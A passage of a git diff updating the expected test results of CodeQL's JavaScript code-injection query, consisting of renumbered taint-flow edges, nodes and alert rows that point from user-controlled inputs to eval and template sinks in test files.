tst.js:22:18:22:41 | documen ... .search | user-provided value | +| tst.js:28:28:28:33 | source | tst.js:22:18:22:41 | documen ... .search | tst.js:28:28:28:33 | source | This code execution depends on a $@. | tst.js:22:18:22:41 | documen ... .search | user-provided value | +| tst.js:30:33:30:38 | source | tst.js:22:18:22:41 | documen ... .search | tst.js:30:33:30:38 | source | This code execution depends on a $@. | tst.js:22:18:22:41 | documen ... .search | user-provided value | +| webix/webix.html:3:16:3:37 | documen ... on.hash | webix/webix.html:3:16:3:37 | documen ... on.hash | webix/webix.html:3:16:3:37 | documen ... on.hash | This code execution depends on a $@. | webix/webix.html:3:16:3:37 | documen ... on.hash | user-provided value | +| webix/webix.html:4:26:4:47 | documen ... on.hash | webix/webix.html:4:26:4:47 | documen ... on.hash | webix/webix.html:4:26:4:47 | documen ... on.hash | Template, which may contain code, depends on a $@. | webix/webix.html:4:26:4:47 | documen ... on.hash | user-provided value | +| webix/webix.html:5:47:5:68 | documen ... on.hash | webix/webix.html:5:47:5:68 | documen ... on.hash | webix/webix.html:5:47:5:68 | documen ... on.hash | Template, which may contain code, depends on a $@. | webix/webix.html:5:47:5:68 | documen ... on.hash | user-provided value | +| webix/webix.js:3:12:3:33 | documen ... on.hash | webix/webix.js:3:12:3:33 | documen ... on.hash | webix/webix.js:3:12:3:33 | documen ... on.hash | This code execution depends on a $@. | webix/webix.js:3:12:3:33 | documen ... on.hash | user-provided value | +| webix/webix.js:4:22:4:43 | documen ... on.hash | webix/webix.js:4:22:4:43 | documen ... on.hash | webix/webix.js:4:22:4:43 | documen ... on.hash | Template, which may contain code, depends on a $@. | webix/webix.js:4:22:4:43 | documen ... on.hash | user-provided value | +| webix/webix.js:5:43:5:64 | documen ... on.hash | webix/webix.js:5:43:5:64 | documen ... on.hash | webix/webix.js:5:43:5:64 | documen ... on.hash | Template, which may contain code, depends on a $@. | webix/webix.js:5:43:5:64 | documen ... on.hash | user-provided value | edges | NoSQLCodeInjection.js:18:24:18:31 | req.body | NoSQLCodeInjection.js:18:24:18:37 | req.body.query | provenance | | | NoSQLCodeInjection.js:19:36:19:43 | req.body | NoSQLCodeInjection.js:19:24:19:48 | "name = ... dy.name | provenance | | | NoSQLCodeInjection.js:22:36:22:43 | req.body | NoSQLCodeInjection.js:22:24:22:48 | "name = ... dy.name | provenance | | -| express.js:7:44:7:62 | req.param("wobble") | express.js:7:24:7:69 | "return ... + "];" | provenance | | -| express.js:9:54:9:72 | req.param("wobble") | express.js:9:34:9:79 | "return ... + "];" | provenance | | -| express.js:12:28:12:46 | req.param("wobble") | express.js:12:8:12:53 | "return ... + "];" | provenance | | -| express.js:26:9:26:35 | taint | express.js:27:34:27:38 | taint | provenance | | -| express.js:26:17:26:35 | req.param("wobble") | express.js:26:9:26:35 | taint | provenance | | -| express.js:34:9:34:35 | taint | express.js:43:15:43:19 | taint | provenance | | -| express.js:34:17:34:35 | req.param("wobble") | express.js:34:9:34:35 | taint | provenance | | -| express.js:49:30:49:32 | msg | express.js:50:10:50:12 | msg | provenance | | +| express.js:6:44:6:62 | req.param("wobble") | express.js:6:24:6:69 | "return ... + "];" | provenance | | +| express.js:7:54:7:72 | req.param("wobble") | express.js:7:34:7:79 | "return ... + "];" | provenance | | +| express.js:9:28:9:46 | req.param("wobble") | express.js:9:8:9:53 | "return ... + "];" | provenance | | +| express.js:19:9:19:35 | taint | express.js:20:34:20:38 | taint | provenance | | +| express.js:19:17:19:35 | req.param("wobble") | express.js:19:9:19:35 | taint | provenance | | +| express.js:27:9:27:35 | taint | express.js:36:15:36:19 | taint | provenance | | +| express.js:27:17:27:35 | req.param("wobble") | express.js:27:9:27:35 | taint | provenance | | +| express.js:42:30:42:32 | msg | express.js:43:10:43:12 | msg | provenance | | | react-native.js:7:7:7:33 | tainted | react-native.js:8:32:8:38 | tainted | provenance | | | react-native.js:7:7:7:33 | tainted | react-native.js:10:23:10:29 | tainted | provenance | | | react-native.js:7:17:7:33 | req.param("code") | react-native.js:7:7:7:33 | tainted | provenance | | @@ -28,17 +93,17 @@ edges | template-sinks.js:18:9:18:31 | tainted | template-sinks.js:32:16:32:22 | tainted | provenance | | | template-sinks.js:18:9:18:31 | tainted | template-sinks.js:33:17:33:23 | tainted | provenance | | | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:18:9:18:31 | tainted | provenance | | -| tst.js:2:6:2:27 | documen ... on.href | tst.js:2:6:2:83 | documen ... t=")+8) | provenance | | -| tst.js:14:10:14:33 | documen ... .search | tst.js:14:10:14:74 | documen ... , "$1") | provenance | | -| tst.js:23:11:23:32 | documen ... on.hash | tst.js:23:11:23:45 | documen ... ring(1) | provenance | | -| tst.js:23:11:23:45 | documen ... ring(1) | tst.js:23:6:23:46 | atob(do ... ing(1)) | provenance | | -| tst.js:26:26:26:40 | location.search | tst.js:26:26:26:53 | locatio ... ring(1) | provenance | | -| tst.js:29:9:29:82 | source | tst.js:31:18:31:23 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:33:14:33:19 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:35:28:35:33 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:37:33:37:38 | source | provenance | | -| tst.js:29:18:29:41 | documen ... .search | tst.js:29:18:29:82 | documen ... , "$1") | provenance | | -| tst.js:29:18:29:82 | documen ... , "$1") | tst.js:29:9:29:82 | source | provenance | | +| tst.js:1:6:1:27 | documen ... on.href | tst.js:1:6:1:83 | documen ... t=")+8) | provenance | | +| tst.js:11:10:11:33 | documen ... .search | tst.js:11:10:11:74 | documen ... , "$1") | provenance | | +| tst.js:17:11:17:32 | documen ... on.hash | tst.js:17:11:17:45 | documen ... ring(1) | provenance | | +| tst.js:17:11:17:45 | documen ... ring(1) | tst.js:17:6:17:46 | atob(do ... ing(1)) | provenance | | +| tst.js:19:26:19:40 | location.search | tst.js:19:26:19:53 | locatio ... ring(1) | provenance | | +| tst.js:22:9:22:82 | source | tst.js:24:18:24:23 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:26:14:26:19 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:28:28:28:33 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:30:33:30:38 | source | provenance | | +| tst.js:22:18:22:41 | documen ... .search | tst.js:22:18:22:82 | documen ... , "$1") | provenance | | +| tst.js:22:18:22:82 | documen ... , "$1") | tst.js:22:9:22:82 | source | provenance | | nodes | NoSQLCodeInjection.js:18:24:18:31 | req.body | semmle.label | req.body | | NoSQLCodeInjection.js:18:24:18:37 | req.body.query | semmle.label | req.body.query | @@ -61,24 +126,24 @@ nodes | angularjs.js:47:16:47:30 | location.search | semmle.label | location.search | | angularjs.js:50:22:50:36 | location.search | semmle.label | location.search | | angularjs.js:53:32:53:46 | location.search | semmle.label | location.search | -| express.js:7:24:7:69 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:7:44:7:62 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:9:34:9:79 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:9:54:9:72 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:12:8:12:53 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:12:28:12:46 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:15:22:15:54 | req.par ... ction") | semmle.label | req.par ... ction") | -| express.js:17:30:17:53 | req.par ... cript") | semmle.label | req.par ... cript") | -| express.js:19:37:19:70 | req.par ... odule") | semmle.label | req.par ... odule") | -| express.js:21:19:21:48 | req.par ... ntext") | semmle.label | req.par ... ntext") | -| express.js:26:9:26:35 | taint | semmle.label | taint | -| express.js:26:17:26:35 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:27:34:27:38 | taint | semmle.label | taint | -| express.js:34:9:34:35 | taint | semmle.label | taint | -| express.js:34:17:34:35 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:43:15:43:19 | taint | semmle.label | taint | -| express.js:49:30:49:32 | msg | semmle.label | msg | -| express.js:50:10:50:12 | msg | semmle.label | msg | +| express.js:6:24:6:69 | "return ... + "];" | semmle.label | "return ... + "];" | +| express.js:6:44:6:62 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:7:34:7:79 | "return ... + "];" | semmle.label | "return ... + "];" | +| express.js:7:54:7:72 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:9:8:9:53 | "return ... + "];" | semmle.label | "return ... + "];" | +| express.js:9:28:9:46 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:11:22:11:54 | req.par ... ction") | semmle.label | req.par ... ction") | +| express.js:12:30:12:53 | req.par ... cript") | semmle.label | req.par ... cript") | +| express.js:13:37:13:70 | req.par ... odule") | semmle.label | req.par ... odule") | +| express.js:14:19:14:48 | req.par ... ntext") | semmle.label | req.par ... ntext") | +| express.js:19:9:19:35 | taint | semmle.label | taint | +| express.js:19:17:19:35 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:20:34:20:38 | taint | semmle.label | taint | +| express.js:27:9:27:35 | taint | semmle.label | taint | +| express.js:27:17:27:35 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:36:15:36:19 | taint | semmle.label | taint | +| express.js:42:30:42:32 | msg | semmle.label | msg | +| express.js:43:10:43:12 | msg | semmle.label | msg | | module.js:9:16:9:29 | req.query.code | semmle.label | req.query.code | | module.js:11:17:11:30 | req.query.code | semmle.label | req.query.code | | react-native.js:7:7:7:33 | tainted | semmle.label | tainted | @@ -102,25 +167,25 @@ nodes | template-sinks.js:31:19:31:25 | tainted | semmle.label | tainted | | template-sinks.js:32:16:32:22 | tainted | semmle.label | tainted | | template-sinks.js:33:17:33:23 | tainted | semmle.label | tainted | -| tst.js:2:6:2:27 | documen ... on.href | semmle.label | documen ... on.href | -| tst.js:2:6:2:83 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:5:12:5:33 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:14:10:14:33 | documen ... .search | semmle.label | documen ... .search | -| tst.js:14:10:14:74 | documen ... , "$1") | semmle.label | documen ... , "$1") | -| tst.js:17:21:17:42 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:20:30:20:51 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:23:6:23:46 | atob(do ... ing(1)) | semmle.label | atob(do ... ing(1)) | -| tst.js:23:11:23:32 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:23:11:23:45 | documen ... ring(1) | semmle.label | documen ... ring(1) | -| tst.js:26:26:26:40 | location.search | semmle.label | location.search | -| tst.js:26:26:26:53 | locatio ... ring(1) | semmle.label | locatio ... ring(1) | -| tst.js:29:9:29:82 | source | semmle.label | source | -| tst.js:29:18:29:41 | documen ... .search | semmle.label | documen ... .search | -| tst.js:29:18:29:82 | documen ... , "$1") | semmle.label | documen ... , "$1") | -| tst.js:31:18:31:23 | source | semmle.label | source | -| tst.js:33:14:33:19 | source | semmle.label | source | -| tst.js:35:28:35:33 | source | semmle.label | source | -| tst.js:37:33:37:38 | source | semmle.label | source | +| tst.js:1:6:1:27 | documen ... on.href | semmle.label | documen ... on.href | +| tst.js:1:6:1:83 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:3:12:3:33 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:11:10:11:33 | documen ... .search | semmle.label | documen ... .search | +| tst.js:11:10:11:74 | documen ... , "$1") | semmle.label | documen ... , "$1") | +| tst.js:13:21:13:42 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:15:30:15:51 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:17:6:17:46 | atob(do ... ing(1)) | semmle.label | atob(do ... ing(1)) | +| tst.js:17:11:17:32 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:17:11:17:45 | documen ... ring(1) | semmle.label | documen ... ring(1) | +| tst.js:19:26:19:40 | location.search | semmle.label | location.search | +| tst.js:19:26:19:53 | locatio ... ring(1) | semmle.label | locatio ... ring(1) | +| tst.js:22:9:22:82 | source | semmle.label | source | +| tst.js:22:18:22:41 | documen ... .search | semmle.label | documen ... .search | +| tst.js:22:18:22:82 | documen ... , "$1") | semmle.label | documen ... , "$1") | +| tst.js:24:18:24:23 | source | semmle.label | source | +| tst.js:26:14:26:19 | source | semmle.label | source | +| tst.js:28:28:28:33 | source | semmle.label | source | +| tst.js:30:33:30:38 | source | semmle.label | source | | webix/webix.html:3:16:3:37 | documen ... on.hash | semmle.label | documen ... on.hash | | webix/webix.html:4:26:4:47 | documen ... on.hash | semmle.label | documen ... on.hash | | webix/webix.html:5:47:5:68 | documen ... on.hash | semmle.label | documen ... on.hash | @@ -128,68 +193,3 @@ nodes | webix/webix.js:4:22:4:43 | documen ... on.hash | semmle.label | documen ... on.hash | | webix/webix.js:5:43:5:64 | documen ... on.hash | semmle.label | documen ... on.hash | subpaths -#select -| NoSQLCodeInjection.js:18:24:18:37 | req.body.query | NoSQLCodeInjection.js:18:24:18:31 | req.body | NoSQLCodeInjection.js:18:24:18:37 | req.body.query | This code execution depends on a $@. | NoSQLCodeInjection.js:18:24:18:31 | req.body | user-provided value | -| NoSQLCodeInjection.js:19:24:19:48 | "name = ... dy.name | NoSQLCodeInjection.js:19:36:19:43 | req.body | NoSQLCodeInjection.js:19:24:19:48 | "name = ... dy.name | This code execution depends on a $@. | NoSQLCodeInjection.js:19:36:19:43 | req.body | user-provided value | -| NoSQLCodeInjection.js:22:24:22:48 | "name = ... dy.name | NoSQLCodeInjection.js:22:36:22:43 | req.body | NoSQLCodeInjection.js:22:24:22:48 | "name = ... dy.name | This code execution depends on a $@. | NoSQLCodeInjection.js:22:36:22:43 | req.body | user-provided value | -| actions.js:4:10:4:50 | github. ... message | actions.js:4:10:4:50 | github. ... message | actions.js:4:10:4:50 | github. ... message | This code execution depends on a $@. | actions.js:4:10:4:50 | github. ... message | user-provided value | -| angularjs.js:10:22:10:36 | location.search | angularjs.js:10:22:10:36 | location.search | angularjs.js:10:22:10:36 | location.search | This code execution depends on a $@. | angularjs.js:10:22:10:36 | location.search | user-provided value | -| angularjs.js:13:23:13:37 | location.search | angularjs.js:13:23:13:37 | location.search | angularjs.js:13:23:13:37 | location.search | This code execution depends on a $@. | angularjs.js:13:23:13:37 | location.search | user-provided value | -| angularjs.js:16:28:16:42 | location.search | angularjs.js:16:28:16:42 | location.search | angularjs.js:16:28:16:42 | location.search | This code execution depends on a $@. | angularjs.js:16:28:16:42 | location.search | user-provided value | -| angularjs.js:19:22:19:36 | location.search | angularjs.js:19:22:19:36 | location.search | angularjs.js:19:22:19:36 | location.search | This code execution depends on a $@. | angularjs.js:19:22:19:36 | location.search | user-provided value | -| angularjs.js:22:27:22:41 | location.search | angularjs.js:22:27:22:41 | location.search | angularjs.js:22:27:22:41 | location.search | This code execution depends on a $@. | angularjs.js:22:27:22:41 | location.search | user-provided value | -| angularjs.js:25:23:25:37 | location.search | angularjs.js:25:23:25:37 | location.search | angularjs.js:25:23:25:37 | location.search | This code execution depends on a $@. | angularjs.js:25:23:25:37 | location.search | user-provided value | -| angularjs.js:28:33:28:47 | location.search | angularjs.js:28:33:28:47 | location.search | angularjs.js:28:33:28:47 | location.search | This code execution depends on a $@. | angularjs.js:28:33:28:47 | location.search | user-provided value | -| angularjs.js:31:28:31:42 | location.search | angularjs.js:31:28:31:42 | location.search | angularjs.js:31:28:31:42 | location.search | This code execution depends on a $@. | angularjs.js:31:28:31:42 | location.search | user-provided value | -| angularjs.js:34:18:34:32 | location.search | angularjs.js:34:18:34:32 | location.search | angularjs.js:34:18:34:32 | location.search | This code execution depends on a $@. | angularjs.js:34:18:34:32 | location.search | user-provided value | -| angularjs.js:40:18:40:32 | location.search | angularjs.js:40:18:40:32 | location.search | angularjs.js:40:18:40:32 | location.search | This code execution depends on a $@. | angularjs.js:40:18:40:32 | location.search | user-provided value | -| angularjs.js:44:17:44:31 | location.search | angularjs.js:44:17:44:31 | location.search | angularjs.js:44:17:44:31 | location.search | This code execution depends on a $@. | angularjs.js:44:17:44:31 | location.search | user-provided value | -| angularjs.js:47:16:47:30 | location.search | angularjs.js:47:16:47:30 | location.search | angularjs.js:47:16:47:30 | location.search | This code execution depends on a $@. | angularjs.js:47:16:47:30 | location.search | user-provided value | -| angularjs.js:50:22:50:36 | location.search | angularjs.js:50:22:50:36 | location.search | angularjs.js:50:22:50:36 | location.search | This code execution depends on a $@. | angularjs.js:50:22:50:36 | location.search | user-provided value | -| angularjs.js:53:32:53:46 | location.search | angularjs.js:53:32:53:46 | location.search | angularjs.js:53:32:53:46 | location.search | This code execution depends on a $@. | angularjs.js:53:32:53:46 | location.search | user-provided value | -| express.js:7:24:7:69 | "return ... + "];" | express.js:7:44:7:62 | req.param("wobble") | express.js:7:24:7:69 | "return ... + "];" | This code execution depends on a $@. | express.js:7:44:7:62 | req.param("wobble") | user-provided value | -| express.js:9:34:9:79 | "return ... + "];" | express.js:9:54:9:72 | req.param("wobble") | express.js:9:34:9:79 | "return ... + "];" | This code execution depends on a $@. | express.js:9:54:9:72 | req.param("wobble") | user-provided value | -| express.js:12:8:12:53 | "return ... + "];" | express.js:12:28:12:46 | req.param("wobble") | express.js:12:8:12:53 | "return ... + "];" | This code execution depends on a $@. | express.js:12:28:12:46 | req.param("wobble") | user-provided value | -| express.js:15:22:15:54 | req.par ... ction") | express.js:15:22:15:54 | req.par ... ction") | express.js:15:22:15:54 | req.par ... ction") | This code execution depends on a $@. | express.js:15:22:15:54 | req.par ... ction") | user-provided value | -| express.js:17:30:17:53 | req.par ... cript") | express.js:17:30:17:53 | req.par ... cript") | express.js:17:30:17:53 | req.par ... cript") | This code execution depends on a $@. | express.js:17:30:17:53 | req.par ... cript") | user-provided value | -| express.js:19:37:19:70 | req.par ... odule") | express.js:19:37:19:70 | req.par ... odule") | express.js:19:37:19:70 | req.par ... odule") | This code execution depends on a $@. | express.js:19:37:19:70 | req.par ... odule") | user-provided value | -| express.js:21:19:21:48 | req.par ... ntext") | express.js:21:19:21:48 | req.par ... ntext") | express.js:21:19:21:48 | req.par ... ntext") | This code execution depends on a $@. | express.js:21:19:21:48 | req.par ... ntext") | user-provided value | -| express.js:27:34:27:38 | taint | express.js:26:17:26:35 | req.param("wobble") | express.js:27:34:27:38 | taint | This code execution depends on a $@. | express.js:26:17:26:35 | req.param("wobble") | user-provided value | -| express.js:43:15:43:19 | taint | express.js:34:17:34:35 | req.param("wobble") | express.js:43:15:43:19 | taint | This code execution depends on a $@. | express.js:34:17:34:35 | req.param("wobble") | user-provided value | -| express.js:50:10:50:12 | msg | express.js:49:30:49:32 | msg | express.js:50:10:50:12 | msg | This code execution depends on a $@. | express.js:49:30:49:32 | msg | user-provided value | -| module.js:9:16:9:29 | req.query.code | module.js:9:16:9:29 | req.query.code | module.js:9:16:9:29 | req.query.code | This code execution depends on a $@. | module.js:9:16:9:29 | req.query.code | user-provided value | -| module.js:11:17:11:30 | req.query.code | module.js:11:17:11:30 | req.query.code | module.js:11:17:11:30 | req.query.code | This code execution depends on a $@. | module.js:11:17:11:30 | req.query.code | user-provided value | -| react-native.js:8:32:8:38 | tainted | react-native.js:7:17:7:33 | req.param("code") | react-native.js:8:32:8:38 | tainted | This code execution depends on a $@. | react-native.js:7:17:7:33 | req.param("code") | user-provided value | -| react-native.js:10:23:10:29 | tainted | react-native.js:7:17:7:33 | req.param("code") | react-native.js:10:23:10:29 | tainted | This code execution depends on a $@. | react-native.js:7:17:7:33 | req.param("code") | user-provided value | -| react.js:10:56:10:77 | documen ... on.hash | react.js:10:56:10:77 | documen ... on.hash | react.js:10:56:10:77 | documen ... on.hash | This code execution depends on a $@. | react.js:10:56:10:77 | documen ... on.hash | user-provided value | -| template-sinks.js:20:17:20:23 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:20:17:20:23 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | -| template-sinks.js:21:16:21:22 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:21:16:21:22 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | -| template-sinks.js:22:18:22:24 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:22:18:22:24 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | -| template-sinks.js:23:17:23:23 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:23:17:23:23 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | -| template-sinks.js:24:18:24:24 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:24:18:24:24 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | -| template-sinks.js:25:16:25:22 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:25:16:25:22 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | -| template-sinks.js:26:27:26:33 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:26:27:26:33 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | -| template-sinks.js:27:21:27:27 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:27:21:27:27 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | -| template-sinks.js:28:17:28:23 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:28:17:28:23 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | -| template-sinks.js:29:24:29:30 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:29:24:29:30 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | -| template-sinks.js:30:21:30:27 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:30:21:30:27 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | -| template-sinks.js:31:19:31:25 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:31:19:31:25 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | -| template-sinks.js:32:16:32:22 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:32:16:32:22 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | -| template-sinks.js:33:17:33:23 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:33:17:33:23 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | -| tst.js:2:6:2:83 | documen ... t=")+8) | tst.js:2:6:2:27 | documen ... on.href | tst.js:2:6:2:83 | documen ... t=")+8) | This code execution depends on a $@. | tst.js:2:6:2:27 | documen ... on.href | user-provided value | -| tst.js:5:12:5:33 | documen ... on.hash | tst.js:5:12:5:33 | documen ... on.hash | tst.js:5:12:5:33 | documen ... on.hash | This code execution depends on a $@. | tst.js:5:12:5:33 | documen ... on.hash | user-provided value | -| tst.js:14:10:14:74 | documen ... , "$1") | tst.js:14:10:14:33 | documen ... .search | tst.js:14:10:14:74 | documen ... , "$1") | This code execution depends on a $@. | tst.js:14:10:14:33 | documen ... .search | user-provided value | -| tst.js:17:21:17:42 | documen ... on.hash | tst.js:17:21:17:42 | documen ... on.hash | tst.js:17:21:17:42 | documen ... on.hash | This code execution depends on a $@. | tst.js:17:21:17:42 | documen ... on.hash | user-provided value | -| tst.js:20:30:20:51 | documen ... on.hash | tst.js:20:30:20:51 | documen ... on.hash | tst.js:20:30:20:51 | documen ... on.hash | This code execution depends on a $@. | tst.js:20:30:20:51 | documen ... on.hash | user-provided value | -| tst.js:23:6:23:46 | atob(do ... ing(1)) | tst.js:23:11:23:32 | documen ... on.hash | tst.js:23:6:23:46 | atob(do ... ing(1)) | This code execution depends on a $@. | tst.js:23:11:23:32 | documen ... on.hash | user-provided value | -| tst.js:26:26:26:53 | locatio ... ring(1) | tst.js:26:26:26:40 | location.search | tst.js:26:26:26:53 | locatio ... ring(1) | This code execution depends on a $@. | tst.js:26:26:26:40 | location.search | user-provided value | -| tst.js:31:18:31:23 | source | tst.js:29:18:29:41 | documen ... .search | tst.js:31:18:31:23 | source | This code execution depends on a $@. | tst.js:29:18:29:41 | documen ... .search | user-provided value | -| tst.js:33:14:33:19 | source | tst.js:29:18:29:41 | documen ... .search | tst.js:33:14:33:19 | source | This code execution depends on a $@. | tst.js:29:18:29:41 | documen ... .search | user-provided value | -| tst.js:35:28:35:33 | source | tst.js:29:18:29:41 | documen ... .search | tst.js:35:28:35:33 | source | This code execution depends on a $@. | tst.js:29:18:29:41 | documen ... .search | user-provided value | -| tst.js:37:33:37:38 | source | tst.js:29:18:29:41 | documen ... .search | tst.js:37:33:37:38 | source | This code execution depends on a $@. | tst.js:29:18:29:41 | documen ... .search | user-provided value | -| webix/webix.html:3:16:3:37 | documen ... on.hash | webix/webix.html:3:16:3:37 | documen ... on.hash | webix/webix.html:3:16:3:37 | documen ... on.hash | This code execution depends on a $@. | webix/webix.html:3:16:3:37 | documen ... on.hash | user-provided value | -| webix/webix.html:4:26:4:47 | documen ... on.hash | webix/webix.html:4:26:4:47 | documen ... on.hash | webix/webix.html:4:26:4:47 | documen ... on.hash | Template, which may contain code, depends on a $@. | webix/webix.html:4:26:4:47 | documen ... on.hash | user-provided value | -| webix/webix.html:5:47:5:68 | documen ... on.hash | webix/webix.html:5:47:5:68 | documen ... on.hash | webix/webix.html:5:47:5:68 | documen ... on.hash | Template, which may contain code, depends on a $@. | webix/webix.html:5:47:5:68 | documen ... on.hash | user-provided value | -| webix/webix.js:3:12:3:33 | documen ... on.hash | webix/webix.js:3:12:3:33 | documen ... on.hash | webix/webix.js:3:12:3:33 | documen ... on.hash | This code execution depends on a $@. | webix/webix.js:3:12:3:33 | documen ... on.hash | user-provided value | -| webix/webix.js:4:22:4:43 | documen ... on.hash | webix/webix.js:4:22:4:43 | documen ... on.hash | webix/webix.js:4:22:4:43 | documen ... on.hash | Template, which may contain code, depends on a $@. | webix/webix.js:4:22:4:43 | documen ... on.hash | user-provided value | -| webix/webix.js:5:43:5:64 | documen ... on.hash | webix/webix.js:5:43:5:64 | documen ... on.hash | webix/webix.js:5:43:5:64 | documen ... on.hash | Template, which may contain code, depends on a $@. | webix/webix.js:5:43:5:64 | documen ... on.hash | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/CodeInjection.qlref b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/CodeInjection.qlref index fe9adbf3b64d..bfeec8aec393 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/CodeInjection.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/CodeInjection.qlref @@ -1 +1,2 @@ -Security/CWE-094/CodeInjection.ql +query: Security/CWE-094/CodeInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/HeuristicSourceCodeInjection.expected b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/HeuristicSourceCodeInjection.expected index 2be7dc659f29..ba973943e124 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/HeuristicSourceCodeInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/HeuristicSourceCodeInjection.expected @@ -3,14 +3,14 @@ edges | NoSQLCodeInjection.js:19:36:19:43 | req.body | NoSQLCodeInjection.js:19:24:19:48 | "name = ... dy.name | provenance | | | NoSQLCodeInjection.js:22:36:22:43 | req.body | NoSQLCodeInjection.js:22:24:22:48 | "name = ... dy.name | provenance | | | eslint-escope-build.js:20:22:20:22 | c | eslint-escope-build.js:21:16:21:16 | c | provenance | | -| express.js:7:44:7:62 | req.param("wobble") | express.js:7:24:7:69 | "return ... + "];" | provenance | | -| express.js:9:54:9:72 | req.param("wobble") | express.js:9:34:9:79 | "return ... + "];" | provenance | | -| express.js:12:28:12:46 | req.param("wobble") | express.js:12:8:12:53 | "return ... + "];" | provenance | | -| express.js:26:9:26:35 | taint | express.js:27:34:27:38 | taint | provenance | | -| express.js:26:17:26:35 | req.param("wobble") | express.js:26:9:26:35 | taint | provenance | | -| express.js:34:9:34:35 | taint | express.js:43:15:43:19 | taint | provenance | | -| express.js:34:17:34:35 | req.param("wobble") | express.js:34:9:34:35 | taint | provenance | | -| express.js:49:30:49:32 | msg | express.js:50:10:50:12 | msg | provenance | | +| express.js:6:44:6:62 | req.param("wobble") | express.js:6:24:6:69 | "return ... + "];" | provenance | | +| express.js:7:54:7:72 | req.param("wobble") | express.js:7:34:7:79 | "return ... + "];" | provenance | | +| express.js:9:28:9:46 | req.param("wobble") | express.js:9:8:9:53 | "return ... + "];" | provenance | | +| express.js:19:9:19:35 | taint | express.js:20:34:20:38 | taint | provenance | | +| express.js:19:17:19:35 | req.param("wobble") | express.js:19:9:19:35 | taint | provenance | | +| express.js:27:9:27:35 | taint | express.js:36:15:36:19 | taint | provenance | | +| express.js:27:17:27:35 | req.param("wobble") | express.js:27:9:27:35 | taint | provenance | | +| express.js:42:30:42:32 | msg | express.js:43:10:43:12 | msg | provenance | | | react-native.js:7:7:7:33 | tainted | react-native.js:8:32:8:38 | tainted | provenance | | | 